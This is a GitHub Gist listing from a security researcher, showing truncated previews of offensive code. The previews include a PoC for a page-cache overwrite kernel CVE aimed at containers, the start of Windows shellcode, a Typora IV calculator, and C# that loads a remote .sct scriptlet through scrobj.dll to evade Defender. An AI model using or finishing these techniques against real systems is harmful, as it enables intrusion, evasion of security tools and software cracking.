0xlane
/ poc_marker.py
Created
May 8, 2026 04:30
CVE-2026-31431 (Copy Fail) — Container experiment scripts: cross-tenant attack, hostPath bypass, layer verification
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| CVE-2026-31431 "Copy Fail" — Page Cache Marker for Container Experiments | |
| ========================================================================= | |
| Writes 0xDEADBEEF to the first 4 bytes of a target file's page cache. | |
| Used to demonstrate cross-container page cache sharing via shared image layers. | |
| Usage: | |
| python3 poc_marker.py <target_file> | |
| python3 poc_marker.py /bin/cat |
0xlane
/ exp3_2_gdb.py
Created
May 8, 2026 04:30
CVE-2026-31431 (Copy Fail) — GDB Scripts for kernel-level vulnerability verification
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| GDB Python script for Experiment 3.2+3.3 | |
| Traces scatterwalk_map_and_copy writes and SGL layout during authencesn decrypt. | |
| Usage: gdb ./vmlinux -x exp3_2_gdb.py | |
| Then: target remote :1234 | |
| continue | |
| """ | |
| import gdb |
0xlane
/ Dockerfile
Created
May 8, 2026 04:30
CVE-2026-31431 (Copy Fail) — QEMU Debug Environment: kernel build, PoC, and automated experiments
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM debian:bookworm | |
| RUN apt-get update && apt-get install -y --no-install-recommends \ | |
| build-essential bc bison flex libelf-dev libssl-dev \ | |
| cpio wget xz-utils python3 ca-certificates kmod \ | |
| && rm -rf /var/lib/apt/lists/* | |
| WORKDIR /build | |
| # Download Linux 6.12.8 kernel source |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ce24e780246b8690eaf712a6d89136255c98d3db |
0xlane
/ calc_typora_iv.cpp
Created
January 15, 2025 03:32
Calculate typora IV by calling main.node.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <iostream> | |
| #include <iomanip> | |
| typedef int64_t(*FunctionPtr)(int64_t* array, int64_t p2, int64_t p3); | |
| int main() { | |
| HMODULE hModule = LoadLibrary(L"./main.node"); | |
| DWORD_PTR baseAddress = (DWORD_PTR)hModule; | |
| DWORD_PTR functionOffset = 0x1992; | |
| DWORD_PTR functionAddress = baseAddress + functionOffset; | |
| FunctionPtr func = (FunctionPtr)functionAddress; |
0xlane
/ shellcode_calc_create_thread.asm
Last active
October 25, 2024 11:18
nasm -f win64 shellcode_create_thread.asm -o shellcode_create_thread.obj
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| section .text | |
| global _start | |
| _start: | |
| ; 保存堆栈状态 | |
| sub rsp, 0x8 | |
| push rbp | |
| mov rbp, rsp | |
| push rax | |
| push rcx |
0xlane
/ scrobj-call-csharp.cs
Created
October 12, 2020 14:59
Call scrobj.dll in .net env without regsvr32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Author: REInject | |
| * Usage: scrobj-call-csharp.exe http://127.0.0.1/test.sct | |
| * Link: https://scriptboy.cn/p/using-scrobj-without-regsvr32-bypass-defender/ | |
| */ | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.ComponentModel; |
0xlane
/ QT-ShowHiddendFrontendModule_view.user.js
Last active
February 25, 2021 03:08
0xlane
/ index.html
Created
January 2, 2020 16:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function createXmlHttp() { | |
| if (window.XMLHttpRequest) { | |
| xmlHttp = new XMLHttpRequest() | |
| } else { | |
| var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); | |
| for (var n = 0; n < MSXML.length; n++) { | |
| try { | |
| xmlHttp = new ActiveXObject(MSXML[n]); |